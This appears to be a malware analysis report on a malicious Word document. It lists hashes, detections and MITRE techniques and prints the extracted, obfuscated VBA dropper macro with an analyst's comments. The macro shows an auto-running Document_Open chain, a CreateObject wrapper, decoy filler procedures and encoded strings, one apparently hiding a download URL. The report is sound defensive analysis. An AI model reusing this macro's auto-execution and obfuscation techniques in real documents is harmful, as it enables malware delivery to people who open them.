Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 451d9b57f26c0ad8…

MALICIOUS

Office (OLE)

100.0 KB Created: 2016-05-31 21:49:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 9e40f86b1e1e41d50069edc46a1130dc SHA-1: 78baca3dbc78ffb6fe584c0243da1fecd00d7b93 SHA-256: 451d9b57f26c0ad8a20d9d34062cdee5a317830a64bd2c20b249ec4d2aadd800
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, including a Document_Open macro that runs automatically when the document is opened. Heuristics indicate the use of CreateObject and CallByName, which are commonly used to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this document acts as a dropper for further malicious content. No specific URLs or executable payloads were directly extracted, but the macro's intent is to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18505 bytes
SHA-256: c504e20e2cbfcf9dd6040dfad6a6a9ee664322dc0122ccbb406d320b3d3f9edf
Preview script
First 1,000 lines of the extracted script
' Module attributes of the ThisDocument class module. This is the module that
' defines Document_Open (below), the auto-execution entry point flagged as
' OLE_VBA_DOCOPEN.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Not reached from Document_Open (which only calls bTaRXUr.CHdZBeaOOeuX).
' Every name it invokes (eBVed, BgpuaY, pKmAp, cjAPyuUs, TArUZm, ...) is
' absent from the visible portion of the extracted source, and the locals it
' assigns are never read, so this reads as decoy/padding code meant to bloat
' and obscure the macro — TODO confirm against the full 18505-byte macros.bas.
Private Sub jQzYdsa(ByVal WXQZvb As String, ByVal vKSkJF As Integer)
eBVed True, "W1xQOMpd4TxQ", 9044
BgpuaY "0jY9Fmj2Pj", "hpMFZLDOcZMT3Ri"
pKmAp
QzbLZUfVjo = 6741
If cjAPyuUs("7M0Gpv1Q6BSiN", 886, 440) Then
ANvHoNmNQIT = 9024
TArUZm
fhQBcVDPD 1883
rdGijfk = 3192
KEaqCaY "2HIIyMUMwwrJ"
tvygeconED = "oqKfJ5sdaBT"
Else
EufKsRetxee 653, 5024, 4694
wCiHGhCsEYPmX "OafLmaqp6qQ0nth", 9258
CEEQfwy
YmResu = False
End If
End Sub
' Same shape as jQzYdsa: no visible caller, and every callee (ObRkBZUGFSz,
' RjQhRtmUHFBkf, iCNAKmtDnfb, ...) is undefined in this excerpt. Treat as
' filler until the full artifact shows otherwise.
Private Sub FVqPtVzLbBiW(ByVal LLFnybnFfKW As Integer)
ObRkBZUGFSz "r30mYZCNv5", "g1GOUEScdTkBpdr", "N79vMn0STl"
TXOwdM = 358
RjQhRtmUHFBkf
UUvhUelCObJDu = "PNDguUKzwrpWZ"
If iCNAKmtDnfb(True, 55, True) Then
rEwZafNTf = 4069
UkHLdwxvHAb 555, "cy4qgDjlwx", 2131
hoUcwrywoXm = "BO59agtL35F2eGF"
tfyXoynAv
Else
QtZpFE
HDncKyvZC 9355
bhmXXPfDA = "YqLLvZ4M1VtEl"
End If
End Sub
' Auto-execution entry point: runs when the document is opened (the
' OLE_VBA_DOCOPEN finding). The two locals are declared but never used;
' the only real work is the call into module bTaRXUr, which starts the
' decode-and-act chain annotated below.
Private Sub Document_Open()
Dim ZhJRcqudJckpG As Integer
Dim TcvXahI As Boolean
bTaRXUr.CHdZBeaOOeuX
End Sub

' Module header for bTaRXUr: holds CHdZBeaOOeuX (called from Document_Open),
' the CreateObject wrapper, and the three string-decoding accessors.
Attribute VB_Name = "bTaRXUr"
' No visible caller; LgYZkTEWf and vahYr are undefined in this excerpt and
' the assigned local is never read. Looks like filler.
Private Sub vxBICXigh(ByVal bHwOgPgCT As String, ByVal rGBbIWxCwk As String)
LgYZkTEWf "D0dsLwg1he"
FXMcChnBHii = "XIOVaaU1x2X"
vahYr "RQ3K5kpZLK", "8HWGKTntgvL6qb", True
End Sub
' No visible caller; CHrIDxARkqeMVO, bqhOfXZt and MbNoALQ are undefined in
' this excerpt. Looks like filler.
Private Sub enkyImFRCE(ByVal jVTYoN As Integer, ByVal ALVnvrW As String)
CHrIDxARkqeMVO 3110
xdtSRaIXuqiKau = 6371
bqhOfXZt "S3nApXdu4Rypwu1", "UnZSUQba20eazHl"
pLteHzjvhtWwe = True
MbNoALQ
End Sub
' No visible caller; the three bare calls name procedures that do not appear
' in this excerpt, and neither parameter is used. Looks like filler.
Private Sub KaQctHz(ByVal XigcJDDxhVwOxC As String, ByVal NTqsuxlmZFHhl As Boolean)
xKCuSaT
wksgysDMQQ
jEDVAQKo
End Sub
' Instantiates a COM object from the ProgID/class string XdsMxJiEMe via
' CreateObject (the OLE_VBA_CREATEOBJ finding) and returns it through the
' identity pass-through mlYjsryiiku. nsuawmYJ and both locals are unused.
' No caller is visible in this excerpt, so which object gets created is
' determined only at runtime by the string passed in.
Public Function ZzcNKRodGvNXQS(ByVal XdsMxJiEMe As String, ByVal nsuawmYJ As String) As Object
Dim JiAmtcnqIXj As Integer
Dim aLOaKchd As String
Set ZzcNKRodGvNXQS = mlYjsryiiku(CreateObject(XdsMxJiEMe))
End Function
' Called from Document_Open. "On Error GoTo UsCufD" sends any runtime error
' to an empty label, so failures exit silently with no user-visible prompt.
' Calls two members of module HzatHdrlntM (not in the visible excerpt)
' before running ttnVyucDd, which wires the decoded strings below into the
' action routine. Both locals are unused.
Public Sub CHdZBeaOOeuX()
Dim iWiKKJCNCaNVOb As String
Dim Veaqx As Integer
On Error GoTo UsCufD
HzatHdrlntM.XKcrcq
HzatHdrlntM.AfTFSWrb
ttnVyucDd
Exit Sub
UsCufD:
End Sub
' No visible caller; qbWCOqqMP, nXByjO, ZKrwvTBaaXmuD, OCvPUlmwtBOXa, fHqyT
' and JGjLLOAtjgzofs are all undefined in this excerpt. Looks like filler.
Private Sub tKTMCDETD(ByVal ydgKSrLAEgVv As String)
plJSEfhf = "EdYL5na0cJUYxo"
If qbWCOqqMP Then
nXByjO False, "4rJeWY2Rl3VZt"
ZKrwvTBaaXmuD
OCvPUlmwtBOXa True
Else
fHqyT 2123
End If
JGjLLOAtjgzofs "sqQWmVQA8", 972
End Sub
' Identity wrapper: returns its argument unchanged (ZWploe is unused). Its
' only effect is to put one more indirection between CreateObject and the
' code that uses the object.
Private Function mlYjsryiiku(ByVal OnPXzVsp As Object) As Object
Dim ZWploe As Integer
Set mlYjsryiiku = OnPXzVsp
End Function
' Action routine, reached from ttnVyucDd. When called from there the third
' argument is the decoded jfiHEeJIxc string; it is handed to
' qFeEnQQlu.nLQKikhdTHVeQ, and the resulting object is then passed on
' together with the decoded wcOlVHXzJYfry string, a second object built from
' the decoded jBdZR string, and pCaCN. Modules qFeEnQQlu, HzuLtqmj and
' gPwHsAClqtMcSA are outside this excerpt, so the concrete operations
' (the download/write/launch steps implied by the ClamAV dropper label)
' cannot be confirmed here — NOTE(review): verify in the full artifact.
Private Sub nUtxIKXiV(ByVal pCaCN As String, ByVal lbXnqGWlg As String, ByVal oIUEmStVomKRL As String)
Set oWcVpImwU = qFeEnQQlu.nLQKikhdTHVeQ(True, oIUEmStVomKRL)
qFeEnQQlu.sQKUvGR wcOlVHXzJYfry, 2670, "HrklKlpxp4Rbh", oWcVpImwU
HzuLtqmj.xfMSRUhFMoMfT gPwHsAClqtMcSA.LZzmvBgbVHUG(jBdZR, oWcVpImwU, 8879), False, "fzxoudqqXa4ZNqC", pCaCN
End Sub
' Second step of the Document_Open chain (called from CHdZBeaOOeuX). Passes a
' value from HzuLtqmj.vFLBWmnEugY, a fixed literal, and the decoded
' jfiHEeJIxc string to nUtxIKXiV, then calls a further HzuLtqmj member.
' ZHMiHEZXATB is unused.
Private Sub ttnVyucDd()
Dim ZHMiHEZXATB As Boolean
nUtxIKXiV HzuLtqmj.vFLBWmnEugY, "RwXOs4QSZ", jfiHEeJIxc
HzuLtqmj.NCIRyjbbVyjeWu False, 618, HzuLtqmj.vFLBWmnEugY
End Sub
' Returns a string decoded at runtime by faktSoyQZsugY.wUlVPgPht from an
' obfuscated literal and a short key; used as the first argument to
' qFeEnQQlu.sQKUvGR in nUtxIKXiV. The decoder body is truncated in this
' excerpt, so the plaintext is not recoverable from here.
Private Function wcOlVHXzJYfry() As String
wcOlVHXzJYfry = faktSoyQZsugY.wUlVPgPht("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
' Same decoder pattern as wcOlVHXzJYfry; the result is fed to
' gPwHsAClqtMcSA.LZzmvBgbVHUG in nUtxIKXiV. Plaintext depends on the
' truncated wUlVPgPht.
Private Function jBdZR() As String
jBdZR = faktSoyQZsugY.wUlVPgPht("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
' Same decoder pattern. The obfuscated literal carries ":", "//" and "."
' separators in URL-like positions and is what ttnVyucDd passes into
' nUtxIKXiV, so it is the likeliest home of the remote location the report
' summary says was not extracted (the EMBEDDED_URL finding lists only Office
' schema namespaces). The plaintext depends on wUlVPgPht, which is truncated
' here — TODO recover it from the full artifact and add it to the IoC list.
Private Function jfiHEeJIxc() As String
jfiHEeJIxc = faktSoyQZsugY.wUlVPgPht("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

' Module header for faktSoyQZsugY: holds the string decoder wUlVPgPht used by
' the three accessors in bTaRXUr (its body is truncated in this excerpt).
Attribute VB_Name = "faktSoyQZsugY"
' Returns GJjopCUTbk unchanged when FuEeeCR.rAcvlfxsVCQZyr(...) is False;
' otherwise the function falls through and returns VBA's default empty
' string. FuEeeCR is outside the excerpt and no caller is visible, so this
' is probably more filler — TODO confirm.
Private Function UomUvsvyC(ByVal ejOsbUk As Integer, ByVal ZTOoxPL As Integer, ByVal looMAGbKjgM As String, ByVal GJjopCUTbk As String) As String
If Not FuEeeCR.rAcvlfxsVCQZyr(GJjopCUTbk, False, False, looMAGbKjgM) Then
UomUvsvyC = GJjopCUTbk
End If
End Function
' No visible caller; FFUcJAXpZjKY and PofHxzJigwOatN are undefined in this
' excerpt, the parameter is unused, and the return value is a fixed literal.
' Looks like filler.
Private Function dnWuE(ByVal UepDAMzNzgw As String) As String
FFUcJAXpZjKY
stJPRDBDbl = False
PofHxzJigwOatN
dnWuE = "wfks2vMRSS4eT1"
End Function
Public Function wUlVPgPht(ByVal yMlhb As String, ByVal bjHZSzSZ As String) 
... (truncated)